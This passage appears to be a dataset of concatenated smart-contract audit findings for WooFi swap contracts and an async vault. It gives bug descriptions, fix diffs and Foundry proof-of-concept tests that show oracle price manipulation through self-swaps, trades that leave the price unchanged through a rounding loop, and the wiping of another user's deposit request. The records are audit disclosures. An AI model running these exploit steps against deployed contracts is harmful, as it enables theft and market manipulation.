below\\n s = _decodeKS(uint16(bytes2(_input[5 // Add the line below\\n i * 9 // Add the line below\\n 5:5 // Add the line below\\n i * 9 // Add the line below\\n 7])));\\n// Add the line below\\n k = _decodeKS(uint16(bytes2(_input[5 // Add the line below\\n i * 9 // Add the line below\\n 7:5 // Add the line below\\n i * 9 // Add the line below\\n 9])));\\n _setState(base, p, s, k);\\n }\\n\\n// Remove the line below\\n timestamp = (op == 1) ? block.timestamp : uint256(uint32(bytes4(_input[1 // Add the line below\\n len * 9:1 // Add the line below\\n len * 9 // Add the line below\\n 4])));\\n// Add the line below\\n timestamp = (op == 1) ? block.timestamp : uint256(uint32(bytes4(_input[5 // Add the line below\\n len * 9:5 // Add the line below\\n len * 9 // Add the line below\\n 4])));\\n } else {\\n revert(\"WooracleV2_2: !op\");\\n }\\n```\\nчThis bug would result in unintended exceptions and potential damages such as:\\nCollision with normal price post functions might cause users' trades executed on incorrect price and suffer losses.\\nCollision with any view function might cause price post to fail silently and hold on trade processing until next submission, and users' trades might be executed on a delayed inexact price.\\nCollision with `setStaleDuration()` might cause price freshness check to break down.ч```\\nfallback () external [payable];\\nfallback (bytes calldata _input) external [payable] returns (bytes memory _output);\\n```\\n -Price manipulation by swapping any ````baseToken```` with itselfчmediumч`WooPPV2.swap()` doesn't forbid the case that `fromToken == toToken == baseToken`, attackers can make any baseToken's price unboundedly drifting away by swapping with self.\\nThe issue arises due to incorrect logic in WooPPV2._swapBaseToBase():\\nFirstly, we can see the situation that `fromToken == toToken == baseToken` can pass the checks on L521~L522.\\nbaseToken's state & price is cached in memory on L527~L528, and updated first time on L541, but the price 
calculation on L555 still uses the cached state, and the `newBase2Price` is set to `wooracle` on L556 as the final price after the swap.\\nAs a result, swapping `baseToken` with itself will cause a net price drift rather than keeping price unchanged.\\n```\\nFile: contracts\\WooPPV2.sol\\n function _swapBaseToBase(\\n// rest of code\\n ) private nonReentrant whenNotPaused returns (uint256 base2Amount) {\\n require(baseToken1 != address(0) && baseToken1 != quoteToken, \"WooPPV2: !baseToken1\");\\n require(baseToken2 != address(0) && baseToken2 != quoteToken, \"WooPPV2: !baseToken2\");\\n// rest of code\\n IWooracleV2.State memory state1 = IWooracleV2(wooracle).state(baseToken1);\\n IWooracleV2.State memory state2 = IWooracleV2(wooracle).state(baseToken2);\\n// rest of code\\n uint256 newBase1Price;\\n (quoteAmount, newBase1Price) = _calcQuoteAmountSellBase(baseToken1, base1Amount, state1);\\n IWooracleV2(wooracle).postPrice(baseToken1, uint128(newBase1Price));\\n// rest of code\\n uint256 newBase2Price;\\n (base2Amount, newBase2Price) = _calcBaseAmountSellQuote(baseToken2, quoteAmount, state2);\\n IWooracleV2(wooracle).postPrice(baseToken2, uint128(newBase2Price));\\n// rest of code\\n }\\n```\\n\\nThe following coded PoC intuitively shows the problem with a specific case:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.0;\\n\\nimport {Test} from \"../../lib/forge-std/src/Test.sol\";\\nimport {console2} from \"../../lib/forge-std/src/console2.sol\";\\nimport {WooracleV2_2} from \"../../contracts/wooracle/WooracleV2_2.sol\";\\nimport {WooPPV2} from \"../../contracts/WooPPV2.sol\";\\nimport {TestERC20Token} from \"../../contracts/test/TestERC20Token.sol\";\\nimport {TestUsdtToken} from \"../../contracts/test/TestUsdtToken.sol\";\\n\\ncontract TestWbctToken is TestERC20Token {\\n function decimals() public view virtual override returns (uint8) {\\n return 8;\\n }\\n}\\n\\ncontract PriceManipulationAttackTest is Test {\\n WooracleV2_2 oracle;\\n WooPPV2 
pool;\\n TestUsdtToken usdt;\\n TestWbctToken wbtc;\\n address evil = address(0xbad);\\n\\n function setUp() public {\\n usdt = new TestUsdtToken();\\n wbtc = new TestWbctToken();\\n oracle = new WooracleV2_2();\\n pool = new WooPPV2(address(usdt));\\n\\n // parameters reference: Integration_WooPP_Fee_Rebate_Vault.test.ts\\n pool.setMaxGamma(address(wbtc), 0.1e18);\\n pool.setMaxNotionalSwap(address(wbtc), 5_000_000e6);\\n pool.setFeeRate(address(wbtc), 25);\\n oracle.postState({_base: address(wbtc), _price: 50_000e8, _spread: 0.001e18, _coeff: 0.000000001e18});\\n oracle.setWooPP(address(pool));\\n oracle.setAdmin(address(pool), true);\\n pool.setWooracle(address(oracle));\\n\\n // add some initial liquidity\\n usdt.mint(address(this), 10_000_000e6);\\n usdt.approve(address(pool), type(uint256).max);\\n pool.depositAll(address(usdt));\\n\\n wbtc.mint(address(this), 100e8);\\n wbtc.approve(address(pool), type(uint256).max);\\n pool.depositAll(address(wbtc));\\n }\\n\\n function testMaxPriceDriftInNormalCase() public {\\n (uint256 initPrice, bool feasible) = oracle.price(address(wbtc));\\n assertTrue(feasible);\\n assertEq(initPrice, 50_000e8);\\n\\n // buy almost all wbtc in pool\\n usdt.mint(address(this), 5_000_000e6);\\n usdt.transfer(address(pool), 5_000_000e6);\\n pool.swap({\\n fromToken: address(usdt),\\n toToken: address(wbtc),\\n fromAmount: 5_000_000e6,\\n minToAmount: 0,\\n to: address(this),\\n rebateTo: address(this)\\n });\\n\\n (uint256 pastPrice, bool feasible2) = oracle.price(address(wbtc));\\n assertTrue(feasible2);\\n uint256 drift = ((pastPrice - initPrice) * 1e5) / initPrice;\\n assertEq(drift, 502); // 0.502%\\n console2.log(\"Max price drift in normal case: \", _toPercentString(drift));\\n }\\n\\n function testUnboundPriceDriftInAttackCase() public {\\n (uint256 initPrice, bool feasible) = oracle.price(address(wbtc));\\n assertTrue(feasible);\\n assertEq(initPrice, 50_000e8);\\n\\n // top up the evil, in real case, the fund could be from a 
flashloan\\n wbtc.mint(evil, 100e8);\\n\\n for (uint256 i; i < 10; ++i) {\\n vm.startPrank(evil);\\n uint256 balance = wbtc.balanceOf(evil);\\n wbtc.transfer(address(pool), balance);\\n pool.swap({\\n fromToken: address(wbtc),\\n toToken: address(wbtc),\\n fromAmount: balance,\\n minToAmount: 0,\\n to: evil,\\n rebateTo: evil\\n });\\n (uint256 pastPrice, bool feasible2) = oracle.price(address(wbtc));\\n assertTrue(feasible2);\\n uint256 drift = ((pastPrice - initPrice) * 1e5) / initPrice;\\n console2.log(\"Unbound price drift in attack case: \", _toPercentString(drift)); \\n vm.stopPrank();\\n }\\n }\\n\\n function _toPercentString(uint256 drift) internal pure returns (string memory result) {\\n uint256 d_3 = drift % 10;\\n uint256 d_2 = (drift / 10) % 10;\\n uint256 d_1 = (drift / 100) % 10;\\n uint256 d0 = (drift / 1000) % 10;\\n result = string.concat(_toString(d0), \".\", _toString(d_1), _toString(d_2), _toString(d_3), \"%\");\\n uint256 d = drift / 10000;\\n while (d > 0) {\\n result = string.concat(_toString(d % 10), result);\\n d = d / 10;\\n }\\n }\\n\\n function _toString(uint256 digital) internal pure returns (string memory str) {\\n str = new string(1);\\n bytes16 symbols = \"0123456789abcdef\";\\n assembly {\\n mstore8(add(str, 32), byte(digital, symbols))\\n }\\n }\\n}\\n```\\n\\nAnd the logs:\\n```\\n2024-03-woofi-swap\\WooPoolV2> forge test --match-contract PriceManipulationAttackTest -vv\\n[⠆] Compiling// rest of codeNo files changed, compilation skipped\\n[⠰] Compiling// rest of code\\n\\nRunning 2 tests for test/foundry/PriceManipulationAttack.t.sol:PriceManipulationAttackTest\\n[PASS] testMaxPriceDriftInNormalCase() (gas: 158149)\\nLogs:\\n Max price drift in normal case: 0.502%\\n\\n[PASS] testUnboundPriceDriftInAttackCase() (gas: 648243)\\nLogs:\\n Unbound price drift in attack case: 0.499%\\n Unbound price drift in attack case: 0.998%\\n Unbound price drift in attack case: 1.496%\\n Unbound price drift in attack case: 1.994%\\n Unbound price 
drift in attack case: 2.491%\\n Unbound price drift in attack case: 2.988%\\n Unbound price drift in attack case: 3.483%\\n Unbound price drift in attack case: 3.978%\\n Unbound price drift in attack case: 4.473%\\n Unbound price drift in attack case: 4.967%\\n\\nTest result: ok. 2 passed; 0 failed; 0 skipped; finished in 6.59ms\\n\\nRan 1 test suites: 2 tests passed, 0 failed, 0 skipped (2 total tests)\\n```\\nч```\\n2024-03-woofi-swap\\WooPoolV2> git diff\\ndiff --git a/WooPoolV2/contracts/WooPPV2.sol b/WooPoolV2/contracts/WooPPV2.sol\\nindex e7a6ae8..9440089 100644\\n--- a/WooPoolV2/contracts/WooPPV2.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/WooPoolV2/contracts/WooPPV2.sol\\n@@ -520,6 // Add the line below\\n520,7 @@ contract WooPPV2 is Ownable, ReentrancyGuard, Pausable, IWooPPV2 {\\n ) private nonReentrant whenNotPaused returns (uint256 base2Amount) {\\n require(baseToken1 != address(0) && baseToken1 != quoteToken, \"WooPPV2: !baseToken1\");\\n require(baseToken2 != address(0) && baseToken2 != quoteToken, \"WooPPV2: !baseToken2\");\\n// Add the line below\\n require(baseToken1 != baseToken2, \"WooPPV2: baseToken1 == baseToken2\");\\n require(to != address(0), \"WooPPV2: !to\");\\n\\n require(balance(baseToken1) - tokenInfos[baseToken1].reserve >= base1Amount, \"WooPPV2: !BASE1_BALANCE\");\\n```\\nчч```\\nFile: contracts\\WooPPV2.sol\\n function _swapBaseToBase(\\n// rest of code\\n ) private nonReentrant whenNotPaused returns (uint256 base2Amount) {\\n require(baseToken1 != address(0) && baseToken1 != quoteToken, \"WooPPV2: !baseToken1\");\\n require(baseToken2 != address(0) && baseToken2 != quoteToken, \"WooPPV2: !baseToken2\");\\n// rest of code\\n IWooracleV2.State memory state1 = IWooracleV2(wooracle).state(baseToken1);\\n IWooracleV2.State memory state2 = IWooracleV2(wooracle).state(baseToken2);\\n// rest of code\\n uint256 newBase1Price;\\n (quoteAmount, newBase1Price) = _calcQuoteAmountSellBase(baseToken1, 
base1Amount, state1);\\n IWooracleV2(wooracle).postPrice(baseToken1, uint128(newBase1Price));\\n// rest of code\\n uint256 newBase2Price;\\n (base2Amount, newBase2Price) = _calcBaseAmountSellQuote(baseToken2, quoteAmount, state2);\\n IWooracleV2(wooracle).postPrice(baseToken2, uint128(newBase2Price));\\n// rest of code\\n }\\n```\\n -WooFi oracle can fail to validate its price with Chainlink price feedчmediumчThe price precision that the WooOracle uses is 8. However, if the quote token is an expensive token or the base token is a very cheap token, then the price will be too less in decimals and even \"0\" in some cases. This will lead to inefficient trades or inability to compare the woofi price with chainlink price due to chainlink price return with \"0\" value.\\nFirst, let's see how the chainlink price is calculated:\\n```\\nfunction _cloPriceInQuote(address _fromToken, address _toToken)\\n internal\\n view\\n returns (uint256 refPrice, uint256 refTimestamp)\\n {\\n address baseOracle = clOracles[_fromToken].oracle;\\n if (baseOracle == address(0)) {\\n return (0, 0);\\n }\\n address quoteOracle = clOracles[_toToken].oracle;\\n uint8 quoteDecimal = clOracles[_toToken].decimal;\\n\\n (, int256 rawBaseRefPrice, , uint256 baseUpdatedAt, ) = AggregatorV3Interface(baseOracle).latestRoundData();\\n (, int256 rawQuoteRefPrice, , uint256 quoteUpdatedAt, ) = AggregatorV3Interface(quoteOracle).latestRoundData();\\n uint256 baseRefPrice = uint256(rawBaseRefPrice);\\n uint256 quoteRefPrice = uint256(rawQuoteRefPrice);\\n\\n // NOTE: Assume wooracle token decimal is same as chainlink token decimal.\\n uint256 ceoff = uint256(10)**quoteDecimal;\\n refPrice = (baseRefPrice * ceoff) / quoteRefPrice;\\n refTimestamp = baseUpdatedAt >= quoteUpdatedAt ? quoteUpdatedAt : baseUpdatedAt;\\n }\\n```\\n\\nNow, let's assume the quote token is WBTC price of 60,000$ and the baseToken is tokenX that has the price of 0.0001$. 
When the final price is calculated at refPrice, because of the divisions in solidity, the result will be \"0\" as follows: 0.0001 * 1e8 * 1e8 / (60_000 * 1e8) = 0\\nso the return amount will be \"0\".\\nWhen the derived chainlink price is compared with woofi oracle if the chainlink price is \"0\" then the `woPriceInBound` will be set to \"true\" assuming the chainlink price is not set. However, in our case that's not the case, the price returned \"0\" because of divisions:\\n```\\n-> bool woPriceInBound = cloPrice_ == 0 ||\\n ((cloPrice_ * (1e18 - bound)) / 1e18 <= woPrice_ && woPrice_ <= (cloPrice_ * (1e18 + bound)) / 1e18);\\n\\n if (woFeasible) {\\n priceOut = woPrice_;\\n feasible = woPriceInBound;\\n }\\n```\\n\\nIn such a scenario, the chainlink comparison between woofi and chainlink price will not give correct results. The oracle will not be able to detect whether the chainlink price is in \"bound\" with the woofi's returned price.\\nThis also applies if a baseToken price crashes. If the token price gets very low due to market conditions, regardless of the quoteToken being WBTC or USDC the above scenario can happen.
I'd suggest returning the oracle price in \"18\" decimals to get more room on rounding.чThe oracle will fail to validate its price against the chainlink price.ч```\\nfunction _cloPriceInQuote(address _fromToken, address _toToken)\\n internal\\n view\\n returns (uint256 refPrice, uint256 refTimestamp)\\n {\\n address baseOracle = clOracles[_fromToken].oracle;\\n if (baseOracle == address(0)) {\\n return (0, 0);\\n }\\n address quoteOracle = clOracles[_toToken].oracle;\\n uint8 quoteDecimal = clOracles[_toToken].decimal;\\n\\n (, int256 rawBaseRefPrice, , uint256 baseUpdatedAt, ) = AggregatorV3Interface(baseOracle).latestRoundData();\\n (, int256 rawQuoteRefPrice, , uint256 quoteUpdatedAt, ) = AggregatorV3Interface(quoteOracle).latestRoundData();\\n uint256 baseRefPrice = uint256(rawBaseRefPrice);\\n uint256 quoteRefPrice = uint256(rawQuoteRefPrice);\\n\\n // NOTE: Assume wooracle token decimal is same as chainlink token decimal.\\n uint256 ceoff = uint256(10)**quoteDecimal;\\n refPrice = (baseRefPrice * ceoff) / quoteRefPrice;\\n refTimestamp = baseUpdatedAt >= quoteUpdatedAt ? quoteUpdatedAt : baseUpdatedAt;\\n }\\n```\\n -Swaps can happen without changing the price for the next trade due to gamma = 0чmediumчWhen a swap happens in WoofiPool the price is updated accordingly with respect to the value \"gamma\".
However, there are some cases where the swap results to a \"gamma\" value of \"0\" which will not change the new price for the next trade.\\nThis is how the quote token received and new price is calculated when given amount of base tokens are sold to the pool:\\n```\\nfunction _calcQuoteAmountSellBase(\\n address baseToken,\\n uint256 baseAmount,\\n IWooracleV2.State memory state\\n ) private view returns (uint256 quoteAmount, uint256 newPrice) {\\n require(state.woFeasible, \"WooPPV2: !ORACLE_FEASIBLE\");\\n\\n DecimalInfo memory decs = decimalInfo(baseToken);\\n\\n // gamma = k * price * base_amount; and decimal 18\\n uint256 gamma;\\n {\\n uint256 notionalSwap = (baseAmount * state.price * decs.quoteDec) / decs.baseDec / decs.priceDec;\\n require(notionalSwap <= tokenInfos[baseToken].maxNotionalSwap, \"WooPPV2: !maxNotionalValue\");\\n\\n gamma = (baseAmount * state.price * state.coeff) / decs.priceDec / decs.baseDec;\\n require(gamma <= tokenInfos[baseToken].maxGamma, \"WooPPV2: !gamma\");\\n\\n // Formula: quoteAmount = baseAmount * oracle.price * (1 - oracle.k * baseAmount * oracle.price - oracle.spread)\\n quoteAmount =\\n (((baseAmount * state.price * decs.quoteDec) / decs.priceDec) *\\n (uint256(1e18) - gamma - state.spread)) /\\n 1e18 /\\n decs.baseDec;\\n }\\n\\n // newPrice = oracle.price * (1 - k * oracle.price * baseAmount)\\n newPrice = ((uint256(1e18) - gamma) * state.price) / 1e18;\\n }\\n```\\n\\nNow, let's assume: DAI is quoteToken, 18 decimals tokenX is baseToken which has a price of 0.01 DAI, 18 decimals coefficient = 0.000000001 * 1e18 spread = 0.001 * 1e18 baseAmount (amount of tokenX are sold) = 1e10;\\nfirst calculate the gamma: (baseAmount * state.price * state.coeff) / decs.priceDec / decs.baseDec; = 1e10 * 0.01 * 1e8 * 0.000000001 * 1e18 / 1e8 / 1e18 = 0 due to round down\\nlet's calculate the `quoteAmount` will be received: `quoteAmount` = (((baseAmount * state.price * decs.quoteDec) / decs.priceDec) * (uint256(1e18) - gamma - 
state.spread)) / 1e18 / decs.baseDec; (1e10 * 0.01 * 1e8 * 1e18 / 1e8) * (1e18 - 0 - 0.01 * 1e18) / 1e18 / 1e18 = 99900000 which is not \"0\".\\nlet's calculate the new price: newPrice = ((uint256(1e18) - gamma) * state.price) / 1e18; = (1e18 - 0) * 0.01 * 1e8 / 1e18 = 0.01 * 1e8 which is the same price, no price changes!\\nThat would also means if the \"gamma\" is \"0\", then this is the best possible swap outcome. If a user does this in a for loop multiple times in a cheap network, user can trade significant amount of tokens without changing the price.\\nCoded PoC (values are the same as in the above textual scenario):\\n```\\nfunction test_SwapsHappenPriceIsNotUpdatedDueToRoundDown() public {\\n // USDC --> DAI address, mind the naming..\\n uint usdcAmount = 1_000_000 * 1e18;\\n uint wooAmount = 100_000 * 1e18;\\n uint wethAmount = 1_000 * 1e18;\\n deal(USDC, ADMIN, usdcAmount);\\n deal(WOO, ADMIN, wooAmount);\\n deal(WETH, ADMIN, wethAmount);\\n\\n vm.startPrank(ADMIN);\\n IERC20(USDC).approve(address(pool), type(uint256).max);\\n IERC20(WOO).approve(address(pool), type(uint256).max);\\n IERC20(WETH).approve(address(pool), type(uint256).max);\\n pool.depositAll(USDC);\\n pool.depositAll(WOO);\\n pool.depositAll(WETH);\\n vm.stopPrank();\\n\\n uint wooAmountForTapir = 1e10 * 1000;\\n vm.startPrank(TAPIR);\\n deal(WOO, TAPIR, wooAmountForTapir);\\n IERC20(USDC).approve(address(router), type(uint256).max);\\n IERC20(WOO).approve(address(router), type(uint256).max);\\n IERC20(WETH).approve(address(router), type(uint256).max);\\n vm.stopPrank();\\n\\n // WHERE THE MAGIC HAPPENS\\n (uint128 price, ) = oracle.woPrice(WOO);\\n console.log(\"price\", price);\\n \\n uint cumulative;\\n for (uint i = 0; i < 1000; ++i) {\\n vm.prank(TAPIR);\\n cumulative += router.swap(WOO, USDC, wooAmountForTapir / 1000, 0, payable(TAPIR), TAPIR);\\n }\\n\\n (uint128 newPrice, ) = oracle.woPrice(WOO);\\n console.log(\"price\", price);\\n\\n // price hasnt changed although there are 
significant amount of tokens are being traded by TAPIR\\n assertEq(newPrice, price);\\n }\\n```\\nчif the \"gamma\" is \"0\", then revert.чAs by design, the price should change after every trade irrelevant of the amount that is being traded. Also, in a cheap network the attack can be quite realistic. Hence, I'll label this as medium.ч```\\nfunction _calcQuoteAmountSellBase(\\n address baseToken,\\n uint256 baseAmount,\\n IWooracleV2.State memory state\\n ) private view returns (uint256 quoteAmount, uint256 newPrice) {\\n require(state.woFeasible, \"WooPPV2: !ORACLE_FEASIBLE\");\\n\\n DecimalInfo memory decs = decimalInfo(baseToken);\\n\\n // gamma = k * price * base_amount; and decimal 18\\n uint256 gamma;\\n {\\n uint256 notionalSwap = (baseAmount * state.price * decs.quoteDec) / decs.baseDec / decs.priceDec;\\n require(notionalSwap <= tokenInfos[baseToken].maxNotionalSwap, \"WooPPV2: !maxNotionalValue\");\\n\\n gamma = (baseAmount * state.price * state.coeff) / decs.priceDec / decs.baseDec;\\n require(gamma <= tokenInfos[baseToken].maxGamma, \"WooPPV2: !gamma\");\\n\\n // Formula: quoteAmount = baseAmount * oracle.price * (1 - oracle.k * baseAmount * oracle.price - oracle.spread)\\n quoteAmount =\\n (((baseAmount * state.price * decs.quoteDec) / decs.priceDec) *\\n (uint256(1e18) - gamma - state.spread)) /\\n 1e18 /\\n decs.baseDec;\\n }\\n\\n // newPrice = oracle.price * (1 - k * oracle.price * baseAmount)\\n newPrice = ((uint256(1e18) - gamma) * state.price) / 1e18;\\n }\\n```\\n -In the function _handleERC20Received, the fee was incorrectly chargedчmediumчIn the function _handleERC20Received, the fee was incorrectly charged.\\nIn the contract, when external swap occurs, a portion of the fee will be charged. 
However, in function _handleERC20Received, the fee is also charged in internal swap.\\n```\\n} else {\\n // Deduct the external swap fee\\n uint256 fee = (bridgedAmount * dstExternalFeeRate) / FEE_BASE;\\n bridgedAmount -= fee; // @@audit: fee should not be applied to internal swap \\n\\n TransferHelper.safeApprove(bridgedToken, address(wooRouter), bridgedAmount);\\n if (dst1inch.swapRouter != address(0)) {\\n try\\n wooRouter.externalSwap(\\n```\\n\\nAt the same time, when the internal swap fails, this part of the fee will not be returned to the user.чApply fee calculation only to external swaps.\\n```\\nfunction _handleERC20Received(\\n uint256 refId,\\n address to,\\n address toToken,\\n address bridgedToken,\\n uint256 bridgedAmount,\\n uint256 minToAmount,\\n Dst1inch memory dst1inch\\n) internal {\\n address msgSender = _msgSender();\\n\\n // // rest of code\\n\\n } else {\\n if (dst1inch.swapRouter != address(0)) {\\n // Deduct the external swap fee\\n uint256 fee = (bridgedAmount * dstExternalFeeRate) / FEE_BASE;\\n bridgedAmount -= fee; \\n\\n TransferHelper.safeApprove(bridgedToken, address(wooRouter), bridgedAmount);\\n try\\n wooRouter.externalSwap(\\n // // rest of code\\n )\\n returns (uint256 realToAmount) {\\n emit WooCrossSwapOnDstChain(\\n // // rest of code\\n );\\n } catch {\\n bridgedAmount += fee;\\n TransferHelper.safeTransfer(bridgedToken, to, bridgedAmount);\\n emit WooCrossSwapOnDstChain(\\n // // rest of code\\n );\\n }\\n } else {\\n TransferHelper.safeApprove(bridgedToken, address(wooRouter), bridgedAmount);\\n try wooRouter.swap(bridgedToken, toToken, bridgedAmount, minToAmount, payable(to), to) returns (\\n uint256 realToAmount\\n ) {\\n // // rest of code\\n } catch {\\n // // rest of code\\n }\\n }\\n }\\n}\\n```\\nчInternal swaps are incorrectly charged, and fees are not refunded when internal swap fail.ч```\\n} else {\\n // Deduct the external swap fee\\n uint256 fee = (bridgedAmount * dstExternalFeeRate) / FEE_BASE;\\n 
bridgedAmount -= fee; // @@audit: fee should not be applied to internal swap \\n\\n TransferHelper.safeApprove(bridgedToken, address(wooRouter), bridgedAmount);\\n if (dst1inch.swapRouter != address(0)) {\\n try\\n wooRouter.externalSwap(\\n```\\n -Claim functions don't validate if the epoch is settledчhighчBoth claim functions fail to validate if the epoch for the request has been already settled, leading to loss of funds when claiming requests for the current epoch. The issue is worsened as `claimAndRequestDeposit()` can be used to claim a deposit on behalf of any account, allowing an attacker to wipe other's requests.\\nWhen the vault is closed, users can request a deposit, transfer assets and later claim shares, or request a redemption, transfer shares and later redeem assets. Both of these processes store the assets or shares, and later convert these when the epoch is settled. For deposits, the core of the implementation is given by _claimDeposit():\\n```\\nfunction _claimDeposit(\\n address owner,\\n address receiver\\n)\\n internal\\n returns (uint256 shares)\\n{\\n shares = previewClaimDeposit(owner);\\n\\n uint256 lastRequestId = lastDepositRequestId[owner];\\n uint256 assets = epochs[lastRequestId].depositRequestBalance[owner];\\n epochs[lastRequestId].depositRequestBalance[owner] = 0;\\n _update(address(claimableSilo), receiver, shares);\\n emit ClaimDeposit(lastRequestId, owner, receiver, assets, shares);\\n}\\n\\nfunction previewClaimDeposit(address owner) public view returns (uint256) {\\n uint256 lastRequestId = lastDepositRequestId[owner];\\n uint256 assets = epochs[lastRequestId].depositRequestBalance[owner];\\n return _convertToShares(assets, lastRequestId, Math.Rounding.Floor);\\n}\\n\\nfunction _convertToShares(\\n uint256 assets,\\n uint256 requestId,\\n Math.Rounding rounding\\n)\\n internal\\n view\\n returns (uint256)\\n{\\n if (isCurrentEpoch(requestId)) {\\n return 0;\\n }\\n uint256 totalAssets =\\n 
epochs[requestId].totalAssetsSnapshotForDeposit + 1;\\n uint256 totalSupply =\\n epochs[requestId].totalSupplySnapshotForDeposit + 1;\\n\\n return assets.mulDiv(totalSupply, totalAssets, rounding);\\n}\\n```\\n\\nAnd for redemptions in _claimRedeem():\\n```\\nfunction _claimRedeem(\\n address owner,\\n address receiver\\n)\\n internal\\n whenNotPaused\\n returns (uint256 assets)\\n{\\n assets = previewClaimRedeem(owner);\\n uint256 lastRequestId = lastRedeemRequestId[owner];\\n uint256 shares = epochs[lastRequestId].redeemRequestBalance[owner];\\n epochs[lastRequestId].redeemRequestBalance[owner] = 0;\\n _asset.safeTransferFrom(address(claimableSilo), address(this), assets);\\n _asset.transfer(receiver, assets);\\n emit ClaimRedeem(lastRequestId, owner, receiver, assets, shares);\\n}\\n\\nfunction previewClaimRedeem(address owner) public view returns (uint256) {\\n uint256 lastRequestId = lastRedeemRequestId[owner];\\n uint256 shares = epochs[lastRequestId].redeemRequestBalance[owner];\\n return _convertToAssets(shares, lastRequestId, Math.Rounding.Floor);\\n}\\n\\nfunction _convertToAssets(\\n uint256 shares,\\n uint256 requestId,\\n Math.Rounding rounding\\n)\\n internal\\n view\\n returns (uint256)\\n{\\n if (isCurrentEpoch(requestId)) {\\n return 0;\\n }\\n uint256 totalAssets = epochs[requestId].totalAssetsSnapshotForRedeem + 1;\\n uint256 totalSupply = epochs[requestId].totalSupplySnapshotForRedeem + 1;\\n\\n return shares.mulDiv(totalAssets, totalSupply, rounding);\\n}\\n```\\n\\nNote that in both cases the \"preview\" functions are used to convert and calculate the amounts owed to the user: `_convertToShares()` and `_convertToAssets()` use the settled values stored in `epochs[requestId]` to convert between assets and shares.\\nHowever, there is no validation to check if the claiming is done for the current unsettled epoch. 
If a user claims a deposit or redemption during the same epoch it has been requested, the values stored in `epochs[epochId]` will be uninitialized, which means that `_convertToShares()` and `_convertToAssets()` will use zero values leading to zero results too. The claiming process will succeed, but since the converted amounts are zero, the users will always get zero assets or shares.\\nThis is even worsened by the fact that `claimAndRequestDeposit()` can be used to claim a deposit on behalf of any `account`. An attacker can wipe any requested deposit from an arbitrary `account` by simply calling `claimAndRequestDeposit(0, `account`, \"\")`. This will internally execute `_claimDeposit(account, account)`, which will trigger the described issue.\\nThe following proof of concept demonstrates the scenario in which a user claims their own deposit during the current epoch:\\n```\\nfunction test_ClaimSameEpochLossOfFunds_Scenario_A() public {\\n asset.mint(alice, 1_000e18);\\n\\n vm.prank(alice);\\n vault.deposit(500e18, alice);\\n\\n // vault is closed\\n vm.prank(owner);\\n vault.close();\\n\\n // alice requests a deposit\\n vm.prank(alice);\\n vault.requestDeposit(500e18, alice, alice, \"\");\\n\\n // the request is successfully created\\n assertEq(vault.pendingDepositRequest(alice), 500e18);\\n\\n // now alice claims the deposit while vault is still open\\n vm.prank(alice);\\n vault.claimDeposit(alice);\\n\\n // request is gone\\n assertEq(vault.pendingDepositRequest(alice), 0);\\n}\\n```\\n\\nThis other proof of concept illustrates the scenario in which an attacker calls `claimAndRequestDeposit()` to wipe the deposit of another account.\\n```\\nfunction test_ClaimSameEpochLossOfFunds_Scenario_B() public {\\n asset.mint(alice, 1_000e18);\\n\\n vm.prank(alice);\\n vault.deposit(500e18, alice);\\n\\n // vault is closed\\n vm.prank(owner);\\n vault.close();\\n\\n // alice requests a deposit\\n vm.prank(alice);\\n vault.requestDeposit(500e18, alice, alice, \"\");\\n\\n // 
the request is successfully created\\n assertEq(vault.pendingDepositRequest(alice), 500e18);\\n\\n // bob can issue a claim for alice through claimAndRequestDeposit()\\n vm.prank(bob);\\n vault.claimAndRequestDeposit(0, alice, \"\");\\n\\n // request is gone\\n assertEq(vault.pendingDepositRequest(alice), 0);\\n}\\n```\\nчCheck that the epoch associated with the request is not the current epoch.\\n```\\n function _claimDeposit(\\n address owner,\\n address receiver\\n )\\n internal\\n returns (uint256 shares)\\n {\\n// Add the line below\\n uint256 lastRequestId = lastDepositRequestId[owner];\\n// Add the line below\\n if (isCurrentEpoch(lastRequestId)) revert();\\n \\n shares = previewClaimDeposit(owner);\\n\\n// Remove the line below\\n uint256 lastRequestId = lastDepositRequestId[owner];\\n uint256 assets = epochs[lastRequestId].depositRequestBalance[owner];\\n epochs[lastRequestId].depositRequestBalance[owner] = 0;\\n _update(address(claimableSilo), receiver, shares);\\n emit ClaimDeposit(lastRequestId, owner, receiver, assets, shares);\\n }\\n```\\n\\n```\\n function _claimRedeem(\\n address owner,\\n address receiver\\n )\\n internal\\n whenNotPaused\\n returns (uint256 assets)\\n {\\n// Add the line below\\n uint256 lastRequestId = lastRedeemRequestId[owner];\\n// Add the line below\\n if (isCurrentEpoch(lastRequestId)) revert();\\n \\n assets = previewClaimRedeem(owner);\\n// Remove the line below\\n uint256 lastRequestId = lastRedeemRequestId[owner];\\n uint256 shares = epochs[lastRequestId].redeemRequestBalance[owner];\\n epochs[lastRequestId].redeemRequestBalance[owner] = 0;\\n _asset.safeTransferFrom(address(claimableSilo), address(this), assets);\\n _asset.transfer(receiver, assets);\\n emit ClaimRedeem(lastRequestId, owner, receiver, assets, shares);\\n }\\n```\\nчCRITICAL. Requests can be wiped by executing the claim in an unsettled epoch, leading to loss of funds. 
The issue can also be triggered for any arbitrary account by using `claimAndRequestDeposit()`.ч```\\nfunction _claimDeposit(\\n address owner,\\n address receiver\\n)\\n internal\\n returns (uint256 shares)\\n{\\n shares = previewClaimDeposit(owner);\\n\\n uint256 lastRequestId = lastDepositRequestId[owner];\\n uint256 assets = epochs[lastRequestId].depositRequestBalance[owner];\\n epochs[lastRequestId].depositRequestBalance[owner] = 0;\\n _update(address(claimableSilo), receiver, shares);\\n emit ClaimDeposit(lastRequestId, owner, receiver, assets, shares);\\n}\\n\\nfunction previewClaimDeposit(address owner) public view returns (uint256) {\\n uint256 lastRequestId = lastDepositRequestId[owner];\\n uint256 assets = epochs[lastRequestId].depositRequestBalance[owner];\\n return _convertToShares(assets, lastRequestId, Math.Rounding.Floor);\\n}\\n\\nfunction _convertToShares(\\n uint256 assets,\\n uint256 requestId,\\n Math.Rounding rounding\\n)\\n internal\\n view\\n returns (uint256)\\n{\\n if (isCurrentEpoch(requestId)) {\\n return 0;\\n }\\n uint256 totalAssets =\\n epochs[requestId].totalAssetsSnapshotForDeposit + 1;\\n uint256 totalSupply =\\n epochs[requestId].totalSupplySnapshotForDeposit + 1;\\n\\n return assets.mulDiv(totalSupply, totalAssets, rounding);\\n}\\n```\\n -Calling `requestRedeem` with `_msgSender() != owner` will lead to user's shares being locked in the vault foreverчhighчThe `requestRedeem` function in `AsyncSynthVault.sol` can be invoked by a user on behalf of another user, referred to as 